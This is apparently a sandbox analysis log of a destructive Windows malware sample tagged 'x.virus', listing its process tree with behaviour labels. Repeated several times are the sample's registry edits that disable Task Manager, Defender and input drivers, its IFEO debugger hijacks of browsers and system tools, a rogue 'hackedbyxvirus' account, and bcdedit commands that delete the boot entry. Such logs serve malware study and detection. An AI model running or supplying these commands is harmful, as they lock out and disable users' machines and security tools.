C:\Windows\System32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "HideFastUserSwitching" /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Chrome && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msedge.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Edge && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firefox.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Firefox && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\opera.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Opera && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\brave.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Brave && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Internet Explorer && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for PowerShell && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell_ise.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for PowerShell ISE && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Task Manager && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\control.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Control Panel && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Registry Editor && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Notepad && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\net.exenet user hackedbyxvirus8925 /add /random /passwordchg:yes2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user hackedbyxvirus8925 /add /random /passwordchg:yes3⤵
-
-
-
C:\Windows\System32\net.exenet user administrator /active:no2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user administrator /active:no3⤵
-
-
-
C:\Windows\explorer.exeexplorer2⤵
- Boot or Logon Autostart Execution: Active Setup
- Suspicious use of SendNotifyMessage
-
-
C:\Windows\System32\taskkill.exetaskkill /f /im SearchUI.exe2⤵
- Kills process with taskkill
-
-
C:\Windows\System32\taskkill.exetaskkill /f /IM explorer.exe2⤵
- Kills process with taskkill
-
-
C:\Windows\System32\taskkill.exetaskkill /f /im powershell.exe2⤵
-
-
C:\Windows\System32\curl.execurl ascii.live/nyan2⤵
-
-
C:\Windows\System32\curl.execurl ascii.live/rick2⤵
-
-
C:\Windows\System32\curl.execurl ascii.live/dvd2⤵
-
-
C:\Windows\System32\curl.execurl parrot.live2⤵
-
-
C:\Windows\System32\winver.exewinver2⤵
-
-
C:\Windows\System32\wscript.exewscript2⤵
-
-
C:\Windows\System32\cleanmgr.execleanmgr2⤵
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\System32\certmgr.msc"2⤵
- Drops file in System32 directory
- Suspicious behavior: SetClipboardViewer
-
-
C:\Windows\System32\cmd.execmd2⤵
-
-
C:\Windows\System32\calc.execalc2⤵
-
-
C:\Windows\hh.exehh2⤵
-
-
C:\Windows\System32\dxdiag.exedxdiag2⤵
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
-
-
C:\Windows\System32\iexpress.exeiexpress2⤵
-
-
C:\Windows\System32\help.exehelp2⤵
-
-
C:\Windows\HelpPane.exehelppane2⤵
-
-
C:\Windows\winhlp32.exewinhlp322⤵
-
-
C:\Windows\bfsvc.exebfsvc2⤵
-
-
C:\Windows\System32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\System32\bcdedit.exebcdedit /delete {current} /f2⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\System32\cmd.execmd /k "mshta "javascript:var sh=new ActiveXObject('WScript.Shell');var result=sh.Popup('still using this computer?',10,'x.virus',36);close();" && exit"2⤵
-
C:\Windows\System32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell');var result=sh.Popup('still using this computer?',10,'x.virus',36);close();"3⤵
-
-
-
C:\Windows\System32\reg.exereg add HKLM\System\CurrentControlSet\Services\Mouclass/v Start /t REG_DWORD /d4/f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add HKLM\System\CurrentControlSet\Services\Kbdclass/v Start /t REG_DWORD /d4/f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
- Modifies Windows Defender DisableAntiSpyware settings
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Security Center" /v AntiVirusOverride /t REG_DWORD /d 1 /f2⤵
- Windows security bypass
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v BingSearchEnabled /t REG_DWORD /d 0 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v CortanaConsent /t REG_DWORD /d 0 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v AllowCortana /t REG_DWORD /d 0 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoWinKeys /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "HideFastUserSwitching" /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Chrome && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msedge.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Edge && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firefox.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Firefox && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\opera.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Opera && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\brave.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Brave && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Internet Explorer && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for PowerShell && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell_ise.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for PowerShell ISE && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Task Manager && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\control.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Control Panel && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Registry Editor && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Notepad && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\net.exenet user hackedbyxvirus26354 /add /random /passwordchg:yes2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user hackedbyxvirus26354 /add /random /passwordchg:yes3⤵
-
-
-
C:\Windows\System32\net.exenet user administrator /active:no2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user administrator /active:no3⤵
-
-
-
C:\Windows\explorer.exeexplorer2⤵
- Boot or Logon Autostart Execution: Active Setup
- Modifies registry class
- Suspicious use of SendNotifyMessage
-
-
C:\Windows\System32\taskkill.exetaskkill /f /im SearchUI.exe2⤵
-
-
C:\Windows\System32\taskkill.exetaskkill /f /IM explorer.exe2⤵
- Kills process with taskkill
-
-
C:\Windows\System32\taskkill.exetaskkill /f /im powershell.exe2⤵
-
-
C:\Windows\System32\curl.execurl ascii.live/nyan2⤵
-
-
C:\Windows\System32\curl.execurl ascii.live/rick2⤵
-
-
C:\Windows\System32\curl.execurl ascii.live/dvd2⤵
-
-
C:\Windows\System32\curl.execurl parrot.live2⤵
-
-
C:\Windows\System32\winver.exewinver2⤵
-
-
C:\Windows\System32\wscript.exewscript2⤵
-
-
C:\Windows\System32\cleanmgr.execleanmgr2⤵
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\System32\certmgr.msc"2⤵
- Suspicious behavior: SetClipboardViewer
-
-
C:\Windows\System32\cmd.execmd2⤵
-
-
C:\Windows\System32\calc.execalc2⤵
-
-
C:\Windows\hh.exehh2⤵
-
-
C:\Windows\System32\dxdiag.exedxdiag2⤵
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
-
-
C:\Windows\System32\iexpress.exeiexpress2⤵
-
-
C:\Windows\System32\help.exehelp2⤵
-
-
C:\Windows\HelpPane.exehelppane2⤵
-
-
C:\Windows\winhlp32.exewinhlp322⤵
-
-
C:\Windows\bfsvc.exebfsvc2⤵
-
-
C:\Windows\System32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\System32\bcdedit.exebcdedit /delete {current} /f2⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\System32\cmd.execmd /k "mshta "javascript:var sh=new ActiveXObject('WScript.Shell');var result=sh.Popup('still using this computer?',10,'x.virus',36);close();" && exit"2⤵
-
C:\Windows\System32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell');var result=sh.Popup('still using this computer?',10,'x.virus',36);close();"3⤵
-
-
-
C:\Windows\System32\reg.exereg add HKLM\System\CurrentControlSet\Services\Mouclass/v Start /t REG_DWORD /d4/f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add HKLM\System\CurrentControlSet\Services\Kbdclass/v Start /t REG_DWORD /d4/f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
- Modifies Windows Defender DisableAntiSpyware settings
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Security Center" /v AntiVirusOverride /t REG_DWORD /d 1 /f2⤵
- Windows security bypass
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v BingSearchEnabled /t REG_DWORD /d 0 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v CortanaConsent /t REG_DWORD /d 0 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v AllowCortana /t REG_DWORD /d 0 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoWinKeys /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "HideFastUserSwitching" /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Chrome && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msedge.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Edge && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firefox.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Firefox && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\opera.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Opera && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\brave.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Brave && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Internet Explorer && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for PowerShell && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell_ise.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for PowerShell ISE && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Task Manager && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\control.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Control Panel && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Registry Editor && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Notepad && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\net.exenet user hackedbyxvirus16329 /add /random /passwordchg:yes2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user hackedbyxvirus16329 /add /random /passwordchg:yes3⤵
-
-
-
C:\Windows\System32\net.exenet user administrator /active:no2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user administrator /active:no3⤵
-
-
-
C:\Windows\explorer.exeexplorer2⤵
- Boot or Logon Autostart Execution: Active Setup
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of SendNotifyMessage
-
-
C:\Windows\System32\taskkill.exetaskkill /f /im SearchUI.exe2⤵
- Kills process with taskkill
-
-
C:\Windows\System32\taskkill.exetaskkill /f /IM explorer.exe2⤵
- Kills process with taskkill
-
-
C:\Windows\System32\taskkill.exetaskkill /f /im powershell.exe2⤵
- Kills process with taskkill
-
-
C:\Windows\System32\curl.execurl ascii.live/nyan2⤵
-
-
C:\Windows\System32\curl.execurl ascii.live/rick2⤵
-
-
C:\Windows\System32\curl.execurl ascii.live/dvd2⤵
-
-
C:\Windows\System32\curl.execurl parrot.live2⤵
-
-
C:\Windows\System32\winver.exewinver2⤵
-
-
C:\Windows\System32\wscript.exewscript2⤵
-
-
C:\Windows\System32\cleanmgr.execleanmgr2⤵
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\System32\certmgr.msc"2⤵
- Suspicious behavior: SetClipboardViewer
-
-
C:\Windows\System32\cmd.execmd2⤵
-
-
C:\Windows\System32\calc.execalc2⤵
-
-
C:\Windows\hh.exehh2⤵
-
-
C:\Windows\System32\dxdiag.exedxdiag2⤵
- Drops file in System32 directory
- Checks SCSI registry key(s)
- Modifies registry class
-
-
C:\Windows\System32\iexpress.exeiexpress2⤵
-
-
C:\Windows\System32\help.exehelp2⤵
-
-
C:\Windows\HelpPane.exehelppane2⤵
-
-
C:\Windows\winhlp32.exewinhlp322⤵
-
-
C:\Windows\bfsvc.exebfsvc2⤵
-
-
C:\Windows\System32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\System32\bcdedit.exebcdedit /delete {current} /f2⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\System32\cmd.execmd /k "mshta "javascript:var sh=new ActiveXObject('WScript.Shell');var result=sh.Popup('still using this computer?',10,'x.virus',36);close();" && exit"2⤵
-
C:\Windows\System32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell');var result=sh.Popup('still using this computer?',10,'x.virus',36);close();"3⤵
-
-
-
C:\Windows\System32\reg.exereg add HKLM\System\CurrentControlSet\Services\Mouclass/v Start /t REG_DWORD /d4/f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add HKLM\System\CurrentControlSet\Services\Kbdclass/v Start /t REG_DWORD /d4/f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
- Modifies Windows Defender DisableAntiSpyware settings
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Security Center" /v AntiVirusOverride /t REG_DWORD /d 1 /f2⤵
- Windows security bypass
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v BingSearchEnabled /t REG_DWORD /d 0 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v CortanaConsent /t REG_DWORD /d 0 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v AllowCortana /t REG_DWORD /d 0 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoWinKeys /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "HideFastUserSwitching" /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Chrome && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msedge.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Edge && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firefox.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Firefox && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\opera.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Opera && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\brave.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Brave && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Internet Explorer && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for PowerShell && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell_ise.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for PowerShell ISE && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
